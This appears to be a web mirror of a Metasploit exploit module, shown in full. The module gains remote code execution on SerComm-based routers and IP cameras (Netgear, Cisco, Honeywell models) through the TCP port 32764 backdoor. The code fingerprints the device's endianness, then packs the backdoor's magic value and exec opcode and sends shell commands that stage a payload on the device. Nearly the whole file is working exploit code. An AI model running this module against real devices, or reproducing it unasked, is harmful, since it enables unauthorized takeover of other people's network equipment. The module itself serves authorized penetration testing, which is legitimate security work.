Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/sercomm_exec.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "SerComm Device Remote Code Execution",

17
        'Description' => %q{

18
          This module will cause remote code execution on several SerComm devices.

19
          These devices typically include routers from NetGear and Linksys.

20
          This module was tested successfully against several NetGear, Honeywell

21
          and Cisco devices.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc

26
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module

27
        ],

28
        'Payload' => {

29
          'Space' => 10000, # Could be more, but this should be good enough

30
          'DisableNops' => true

31
        },

32
        'Platform' => 'linux',

33
        'Privileged' => false,

34
        'Targets' => [

35
          [

36
            'Generic Linux MIPS Big Endian',

37
            {

38
              'Arch' => ARCH_MIPSBE,

39
              'PackFormat' => 'VVV'

40
            }

41
          ],

42
          [

43
            'Generic Linux MIPS Little Endian',

44
            {

45
              'Arch' => ARCH_MIPSLE,

46
              'PackFormat' => 'NNN'

47
            }

48
          ],

49
          [

50
            'Manual Linux MIPS Big Endian',

51
            {

52
              'Arch' => ARCH_MIPSBE

53
            }

54
          ],

55
          [

56
            'Manual Linux MIPS Little Endian',

57
            {

58
              'Arch' => ARCH_MIPSLE

59
            }

60
          ],

61
          [

62
            'Cisco WAP4410N',

63
            {

64
              'Arch' => ARCH_MIPSBE,

65
              'PackFormat' => 'NNN',

66
            }

67
          ],

68
          [

69
            'Honeywell WAP-PL2 IP Camera',

70
            {

71
              'Arch' => ARCH_MIPSLE,

72
              'PackFormat' => 'VVV'

73
            }

74
          ],

75
          [

76
            'Netgear DG834',

77
            {

78
              'Arch' => ARCH_MIPSBE,

79
              'PackFormat' => 'VVV',

80
              'NoArgs' => true

81
            }

82
          ],

83
          [

84
            'Netgear DG834G',

85
            {

86
              'Arch' => ARCH_MIPSLE,

87
              'PackFormat' => 'VVV',

88
              'PayloadEncode' => 'octal'

89
            }

90
          ],

91
          [

92
            'Netgear DG834PN',

93
            {

94
              'Arch' => ARCH_MIPSBE,

95
              'PackFormat' => 'VVV',

96
              'NoArgs' => true

97
            }

98
          ],

99
          [

100
            'Netgear DGN1000',

101
            {

102
              'Arch' => ARCH_MIPSBE,

103
              'PackFormat' => 'VVV',

104
              'NoArgs' => true

105
            }

106
          ],

107
          [

108
            'Netgear DSG835',

109
            {

110
              'Arch' => ARCH_MIPSBE,

111
              'PackFormat' => 'VVV',

112
              'NoArgs' => true,

113
            }

114
          ],

115
          [

116
            'Netgear WPNT834',

117
            {

118
              'Arch' => ARCH_MIPSBE,

119
              'PackFormat' => 'NNN',

120
              'UploadPath' => '/var',

121
              'PayloadEncode' => 'octal'

122
            }

123
          ]

124
        ],

125
        'DefaultTarget' => 0,

126
        'References' => [

127
          [ 'OSVDB', '101653' ],

128
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]

129
        ],

130
        'DisclosureDate' => '2013-12-31',

131
        'Notes' => {

132
          'Reliability' => UNKNOWN_RELIABILITY,

133
          'Stability' => UNKNOWN_STABILITY,

134
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

135
        }

136
      )

137
    )

138


139
    register_options(

140
      [

141
        Opt::RPORT(32764)

142
      ]

143
    )

144


145
    register_advanced_options(

146
      [

147
        OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),

148
        OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),

149
        OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),

150
        OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),

151
      ]

152
    )

153
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')

154
  end

155


156
  def check

157
    fprint = endian_fingerprint

158


159
    case fprint

160
    when 'BE'

161
      vprint_status("Detected Big Endian")

162
      return Msf::Exploit::CheckCode::Appears

163
    when 'LE'

164
      vprint_status("Detected Little Endian")

165
      return Msf::Exploit::CheckCode::Appears

166
    end

167


168
    return Msf::Exploit::CheckCode::Safe

169
  end

170


171
  def exploit

172
    if target.name =~ /Manual/

173
      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")

174
      @no_args = datastore['NOARGS']

175
      @upload_path = datastore['UPLOADPATH']

176
      @encoding_format = datastore['ENCODING']

177
      @pack_format = datastore['PACKFORMAT']

178
    else

179
      @no_args = target['NoArgs']

180
      @upload_path = target['UploadPath']

181
      @encoding_format = target['PayloadEncode']

182
      @pack_format = target['PackFormat']

183
    end

184


185
    execute_cmdstager(

186
      :noargs => @no_args,

187
      :temp => @upload_path,

188
      :enc_format => @encoding_format,

189
      :flavor => :echo

190
    )

191
  end

192


193
  def endian_fingerprint

194
    begin

195
      connect

196


197
      sock.put(rand_text(5))

198
      res = sock.get_once

199


200
      disconnect

201


202
      if res && res.start_with?("MMcS")

203
        return 'BE'

204
      elsif res && res.start_with?("ScMM")

205
        return 'LE'

206
      end

207
    rescue Rex::ConnectionError => e

208
      print_error("Connection failed: #{e.class}: #{e}")

209
    end

210


211
    return nil

212
  end

213


214
  def execute_command(cmd, opts)

215
    # Get the length of the command, for the backdoor's command injection

216
    cmd_length = cmd.length

217


218
    # 0x53634d4d  => Backdoor code

219
    # 0x07        => Exec command

220
    # cmd_length  => Length of command to execute, sent after communication struct

221
    data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)

222


223
    connect

224
    # Send command structure followed by command text

225
    sock.put(data + cmd)

226
    disconnect

227


228
    Rex.sleep(1)

229
  end

230
end

231


232